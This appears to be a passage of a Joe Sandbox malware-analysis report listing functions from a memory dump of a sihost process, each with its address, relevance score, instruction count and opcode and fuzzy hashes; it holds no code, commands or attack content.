              • API String ID: 0-1837443030
              • Opcode ID: 1dca40d3fd6e5af9c6f8be0ab52a59d4c1db3329778b9a9a74afd4f4cecb7f08
              • Instruction ID: 7f55a00eae0a89734450b9e7aa360fe8cce498ead1e7d96120339c678bb844ed
              • Opcode Fuzzy Hash: 1dca40d3fd6e5af9c6f8be0ab52a59d4c1db3329778b9a9a74afd4f4cecb7f08
              • Instruction Fuzzy Hash: A431E7F6D0992A4AEB46FB7CE5891FD7BD0EF55321F001136DA09C5092DF25A48ACA60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4D159 Relevance: .4, Instructions: 394COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92168764fdade7bd3046c6de2f87c1e7cc74b7a89f010fcc42a7683e82cf380d
              • Instruction ID: 27930909f55e42a2e427dc42fb5868d2430fd9cf1a1d22b396c2df467e57bacb
              • Opcode Fuzzy Hash: 92168764fdade7bd3046c6de2f87c1e7cc74b7a89f010fcc42a7683e82cf380d
              • Instruction Fuzzy Hash: 67E19AB1D1965D8FEB99DB68C4997BCB7B1FF58300F0000BAD40ED7292CA39A985CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF546A0 Relevance: .2, Instructions: 239COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29b0736d966661c163b1cbdb11732b2fe71db48d1bce39078547701a84ad5084
              • Instruction ID: 67fe86b5c5ca275c0253c60dc0f91b16688af3d41de425a34ccef0892abcf7af
              • Opcode Fuzzy Hash: 29b0736d966661c163b1cbdb11732b2fe71db48d1bce39078547701a84ad5084
              • Instruction Fuzzy Hash: 8A716DB0949A5D8FEF95EB78C859AE97BF0FF69311F00016AD50DD3292CE35A885CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4BCE9 Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8db84f5c7380ba0b6f85c88b1b5144bd0e8772c8f3009e4b8970a44715d6f076
              • Instruction ID: ff9496774ad28f2dbcccb8d33de36de0d0b9f0a5979c7d0104e869a6ca2ddef6
              • Opcode Fuzzy Hash: 8db84f5c7380ba0b6f85c88b1b5144bd0e8772c8f3009e4b8970a44715d6f076
              • Instruction Fuzzy Hash: 757106B0D1991D8EEB95EB78C5996ECB7B1FF59300F5001BAD40DE3292DE39A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8f10367be6808a790b889a8bce25b57f0e8eb3801703a529d81e36be4050e764
              • Instruction ID: 909a21f848bde56094f279b7b61d77eb9c7800cf7ba7639e682877a093d5a526
              • Opcode Fuzzy Hash: 8f10367be6808a790b889a8bce25b57f0e8eb3801703a529d81e36be4050e764
              • Instruction Fuzzy Hash: 7071C1B2A2894D8FEB84DF6CE9557BCBBE1EF4A310F4401BAC40DC36D6DA691805CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42035 Relevance: .2, Instructions: 158COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04d44527fe24c1cad323a29d93014faaac972569aa3ef60184a09a050c5ede57
              • Instruction ID: 9ff678531b5b0f543f72b443c0b0e5e24dc828be0d5a4c3dff257f5766ae928b
              • Opcode Fuzzy Hash: 04d44527fe24c1cad323a29d93014faaac972569aa3ef60184a09a050c5ede57
              • Instruction Fuzzy Hash: AC4145F590D68A4FE796DB38D8991B87BD0EF85311F0501BAD84DC31A3DE29E84AC341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF418F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b926cbbd48db19f70a0df344e4381f46cdff06194b3ca1acf41184ec71cb561e
              • Instruction ID: 4dbcbc970f18d9e6b1eb609db073d8839f7b7569cab770a95eae75d1afe124de
              • Opcode Fuzzy Hash: b926cbbd48db19f70a0df344e4381f46cdff06194b3ca1acf41184ec71cb561e
              • Instruction Fuzzy Hash: 2741B370B187498BDB4DDE28C89557AB7E1FF98714B14857DD48AC3286CE31E802C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C450 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 762fc0e105c5b03a67a7ecd484c4a69ae7028834768a0d69588967aabd5d47f8
              • Instruction ID: 266dee6112ffe5d94befdb377288bb204db30e5772ac4261e9b6e4f6b1065c3d
              • Opcode Fuzzy Hash: 762fc0e105c5b03a67a7ecd484c4a69ae7028834768a0d69588967aabd5d47f8
              • Instruction Fuzzy Hash: 6C4108F6D0952A4AEB52BB7DE5481FD3BD0EF55331F001576DA08C6092DF25B48ACAA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF430F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86edb303f448fa45ce7a90bce4e296021860b4f267013b8acd4398846a8c848b
              • Instruction ID: 43fe5a9342032d78ea96c4c9e04b0f255f4e6a7b125c56c0efe3ae3a03c646d2
              • Opcode Fuzzy Hash: 86edb303f448fa45ce7a90bce4e296021860b4f267013b8acd4398846a8c848b
              • Instruction Fuzzy Hash: 21418EF0D1A51A8FEB55DFB8C5986FD77B0EF55310F00013AD809E2282DE3AA94D8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4CE29 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8033ff4815719ec9043b7d980ca27aa417f8b02cdbf7bba03329188c29b4de3b
              • Instruction ID: 6d2771dab4e86f867f7c1dc53fb4c3920dd97281f6255f3874a02df3d840941a
              • Opcode Fuzzy Hash: 8033ff4815719ec9043b7d980ca27aa417f8b02cdbf7bba03329188c29b4de3b
              • Instruction Fuzzy Hash: 56411EB0D0A6598FEB51DFB4C5886EDB7F0EF19311F105176E808E7292DB39A948CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4F384 Relevance: .1, Instructions: 107COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5bb8863902e7520c4d3594fce532c86376ba5e6ba7cb234819a4c0c0a122c9f3
              • Instruction ID: bdd3dbc3d35f828160b435791d9c3922f95e2229c0d63b10557393bad626a309
              • Opcode Fuzzy Hash: 5bb8863902e7520c4d3594fce532c86376ba5e6ba7cb234819a4c0c0a122c9f3
              • Instruction Fuzzy Hash: DF412DF1D1491D8BDBA8DB28C8957A8B7B1EF58300F4041EAC60DE3292CE356EC28F45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C458 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b3cab9d7dbf1bfdeb692157f20b4566be2f76097631ba8a52392d610dbb6e9e5
              • Instruction ID: 7606e51f0dd3d722cab9495ce3490ac57b89307cfde3e05c92025cf9c276f884
              • Opcode Fuzzy Hash: b3cab9d7dbf1bfdeb692157f20b4566be2f76097631ba8a52392d610dbb6e9e5
              • Instruction Fuzzy Hash: 2821E5F6D1966A4AEB52BB7DE5491FE3BD0EF51320F001536E908C1092DF25B88E8A94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4A0E1 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c818782446b6d528fdfe2a9168379d56a9c5dad59518c224ece0869078f5901b
              • Instruction ID: 56738e0dac8b3fa7a3ffdbb984c9840ab90760223f89912ebb4e4ad136307531
              • Opcode Fuzzy Hash: c818782446b6d528fdfe2a9168379d56a9c5dad59518c224ece0869078f5901b
              • Instruction Fuzzy Hash: 592151B0918A4D8FDF89EF28C4995AD3BF0FF68305F1101AAE809D7251DB35E595CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4AA90 Relevance: .1, Instructions: 74COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39b2a20ea75a6a20fb92a45d43f21c7d6e558680e3993be224acdf2779bbc2d0
              • Instruction ID: d49b10894d029c4fe1d2b093411c7778873b4a9936008ea4ed7e3091d4c163a4
              • Opcode Fuzzy Hash: 39b2a20ea75a6a20fb92a45d43f21c7d6e558680e3993be224acdf2779bbc2d0
              • Instruction Fuzzy Hash: 9411B1F1D1951E8EF766EB78C68D1BD3BE4EF58300F044573D808D6092EE25E8888640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4A735 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c1b7e99e0d080bdaaf6ab7273965d528b34bf7ff8330c547401961cd6e7bf73e
              • Instruction ID: 0c9572128bcc838c20664836cefda26fcc0d095ba8df060bf3f0b9251fdb16f0
              • Opcode Fuzzy Hash: c1b7e99e0d080bdaaf6ab7273965d528b34bf7ff8330c547401961cd6e7bf73e
              • Instruction Fuzzy Hash: AC21F9F6D162198AEB14EF78EC895FD33E0EF45324B040176D96CCA192EA26A94D8750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4A705 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 03ac2483997104ec1954b4e5b00f72e4177867cafaefd148e5f09f9b1030dfe1
              • Instruction ID: 7c524e5682ca77a8bd2508707ba8131035326d57f0353ab3b9081b3fea67ea14
              • Opcode Fuzzy Hash: 03ac2483997104ec1954b4e5b00f72e4177867cafaefd148e5f09f9b1030dfe1
              • Instruction Fuzzy Hash: 5411EF75A1652E8ADB48EB38E8081FD73E0EF44325F10057BEA19C6192DF33A949CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40D0D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c679a29935a82dcdd080b1147b7df1fab6573e857bd6e3dad7d785c9ad432d8
              • Instruction ID: 73d9a6231946b838c8d428a9e62d067828105f2fd21b110034a1c2a35b7d0954
              • Opcode Fuzzy Hash: 7c679a29935a82dcdd080b1147b7df1fab6573e857bd6e3dad7d785c9ad432d8
              • Instruction Fuzzy Hash: 741190B1C1964D4EEB5AEB78C89D3B87BB0FF15310F0015BAC809C6492DE76A58CC751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF49C7D Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2370871b8b6828c4fc8e234bd6718e94355b6dfdb947da5dc2940529c1540ff0
              • Instruction ID: df1f7682f7fe579da1a4e08ab6a95f41517c32119d3dab391413e3ee09df4941
              • Opcode Fuzzy Hash: 2370871b8b6828c4fc8e234bd6718e94355b6dfdb947da5dc2940529c1540ff0
              • Instruction Fuzzy Hash: 341151B0A0864E8FDB85EF28C4986A93BE0FF68305F0045AAD419C7161CB35E555CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4ABA5 Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5a28aaf6fcbd61a4337a37849df574d3590ebf56bffd9c5de3d7155ebce6efff
              • Instruction ID: 2dbf954f0ef44a8832b60da6f8d4ef3ed131a8eb4195a5a70d551548bd2795d6
              • Opcode Fuzzy Hash: 5a28aaf6fcbd61a4337a37849df574d3590ebf56bffd9c5de3d7155ebce6efff
              • Instruction Fuzzy Hash: 440180F081964A4FE752EF78C98D1A97BE1FF59300F0055B6D818D70A2EE39E498C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40AED Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 571dbfd0c1f33141b21fb5821615640bdae2e7c66484ec9f6ad783d6e1d1f82f
              • Instruction ID: b3e61d477d2c740b99ee3a1d03e9b1fca3654d8ec396ddb05691ce503f54ed74
              • Opcode Fuzzy Hash: 571dbfd0c1f33141b21fb5821615640bdae2e7c66484ec9f6ad783d6e1d1f82f
              • Instruction Fuzzy Hash: 681160B5A0990DCFEB55EB74C995BEEB7A1EF54300F104275C40AD7195CE38A985CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43415 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff7ec39aa1c96a0f0fd8dc967c9a3e163bbef84a911a42386cfb896724bf754c
              • Instruction ID: 1371393f1ba5e98f989143ccae31a5af4058e849fd6158a689c13020ae1058af
              • Opcode Fuzzy Hash: ff7ec39aa1c96a0f0fd8dc967c9a3e163bbef84a911a42386cfb896724bf754c
              • Instruction Fuzzy Hash: 28117CB091964E8FEB9AEF78C8981FD7BA0FF18301F4004BED919C61A1DB35A448CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4BC69 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 74f967a6bde1873438f1d3c3b049dce3e203e099e968f2d9ae70a540d1e49e9d
              • Instruction ID: b448306d6440ee97398f05d8a76d4ff17eb9c1411f23c2cd682a85b83dcd3cfa
              • Opcode Fuzzy Hash: 74f967a6bde1873438f1d3c3b049dce3e203e099e968f2d9ae70a540d1e49e9d
              • Instruction Fuzzy Hash: 4E115EB0909A4E8FEB96EB74C8992B97BF0FF29301F5004BAD909C6192DE36A544C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C069 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e680c5797016cd8c8efca7b245cc3fba1c8c71ac884d81faf3f63ead905daf4a
              • Instruction ID: 3aa197488606a1005447d01418f805d6fbe8d40791c5b5fb6651d241e14ccc56
              • Opcode Fuzzy Hash: e680c5797016cd8c8efca7b245cc3fba1c8c71ac884d81faf3f63ead905daf4a
              • Instruction Fuzzy Hash: 7511E5B190964D8FDB9AEF38C4991B93FB0FF69301F5001BED409C7092CA36A958C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4B895 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 516eb3f90327e2ce20d068d892ed90591f8138408fb3532b9756cacc0e47dda2
              • Instruction ID: 21c6aba9ac63ef9c3a9765a6be308ca612ebdbf29a361c7fcfd5048811eef029
              • Opcode Fuzzy Hash: 516eb3f90327e2ce20d068d892ed90591f8138408fb3532b9756cacc0e47dda2
              • Instruction Fuzzy Hash: DC118EB090AA4D8FEB99EF38C59D2B97BA0FF18301F0004BAD809C6192DE36A545C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42D61 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24f9983c0560b512cbbc4098357fd489d453ec73fc37b41372d91667aa054adc
              • Instruction ID: c8bfbbda42f35574c86a621788433400f12e6207abb427593be511c29067939c
              • Opcode Fuzzy Hash: 24f9983c0560b512cbbc4098357fd489d453ec73fc37b41372d91667aa054adc
              • Instruction Fuzzy Hash: F7018FB491965E8FE7A2EB78C58C6E97BF0EF59300F4105B6D808C60A2EE79E5488750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF405F1 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 702d04b55df569c88f098190d3491a5570c5095297b885d7b2048278f0ee0567
              • Instruction ID: 1bf184c8dcdc90a9c178252ecdb0d112db04afb05389795dce24a8f8150e0a74
              • Opcode Fuzzy Hash: 702d04b55df569c88f098190d3491a5570c5095297b885d7b2048278f0ee0567
              • Instruction Fuzzy Hash: 7E01B1F191960E4FE792EB78C58D1A97BF0FF98300F4105B5D80AC3092DE38E448CA50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF453FA Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 74518674b2ff9587aa914e005e32d00022539b774869955499dc91e47103c4b1
              • Instruction ID: 8b990c860751cc21e2f1285bd44be963bea5f0f4e52371665a0efe99c029f37d
              • Opcode Fuzzy Hash: 74518674b2ff9587aa914e005e32d00022539b774869955499dc91e47103c4b1
              • Instruction Fuzzy Hash: EC2158B490962ACFEB69CB24C9D47A87371EB44301F1041FAC80EA3781DB39A9C9CF00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF401D0 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2ba458a2df8bbd35088afaf9c1b54310743ea4dc340e15553478895f27efd777
              • Instruction ID: 57b5eed980ebe5fcdf7b473a8df8678a5d2a280839aaeee70379457e4037d81a
              • Opcode Fuzzy Hash: 2ba458a2df8bbd35088afaf9c1b54310743ea4dc340e15553478895f27efd777
              • Instruction Fuzzy Hash: 5C019EB094990E8FEF89EF38C4896BA77A1FF58304F50847EE80EC2191CE32A555CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4A4C9 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8536a2274e30e35ea769965b550bce1dc7def6f4654c49fb6b60371bcf34984
              • Instruction ID: 169cbe7fbf5c08efcc245a056063087c28ecd3399e8a47a84ff7c7483be779c6
              • Opcode Fuzzy Hash: e8536a2274e30e35ea769965b550bce1dc7def6f4654c49fb6b60371bcf34984
              • Instruction Fuzzy Hash: 5B0184B090D64D4FDB56DB74C5AD1B97BA0EF19301F4504BFD80AC6092DE269858C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4A8C8 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a0c6718759dd8885fd3c66c3212909260038cfd743963cf97870fca48169e70
              • Instruction ID: 40a1ae3622402af8bea873594f4b7887f58f29c82a41888fe41c9db669f7e0c8
              • Opcode Fuzzy Hash: 1a0c6718759dd8885fd3c66c3212909260038cfd743963cf97870fca48169e70
              • Instruction Fuzzy Hash: D3015EB091591E9EEB95EB74C44D6BE77E0FF18301F10047AE81ED2190DF35A554CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42DD9 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39646d106ca9a165394084a40819815117eb04e79b0b18d1f7a68bb75be52276
              • Instruction ID: 94764dd65ce63571b6a56c0f73f75f9ba7007be0405e04e2344f76de30b3c7aa
              • Opcode Fuzzy Hash: 39646d106ca9a165394084a40819815117eb04e79b0b18d1f7a68bb75be52276
              • Instruction Fuzzy Hash: B7018FB581E6494FE752EB34C99D5E93FE0EF5A300F0509B7D808CB0A2EA29E458C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF47459 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bedede2c90c7dafb04ebd52a382078469710c64a86fe5ba09bc16598fcaf1d6c
              • Instruction ID: 6c94450e4d38cd6f80aebc48649a055ff95b0a4ef03dd788b0a4e15c90fc9828
              • Opcode Fuzzy Hash: bedede2c90c7dafb04ebd52a382078469710c64a86fe5ba09bc16598fcaf1d6c
              • Instruction Fuzzy Hash: 49112EB4D096198FDBA5DB24C9847E973B4EB14301F1041EAD40DD3245DB399B89CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4C538 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000F.00000002.451959409.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_7ffbacf40000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f605c352bcc5e1257da6ad8ece8fdd11322a29d7206cb350acc10c5843a70ea1
              • Instruction ID: 6675b40f18ddc067b50dc60b4f2bce7dbe7aa82e5d0d4824ee8fac0c7cc2865f
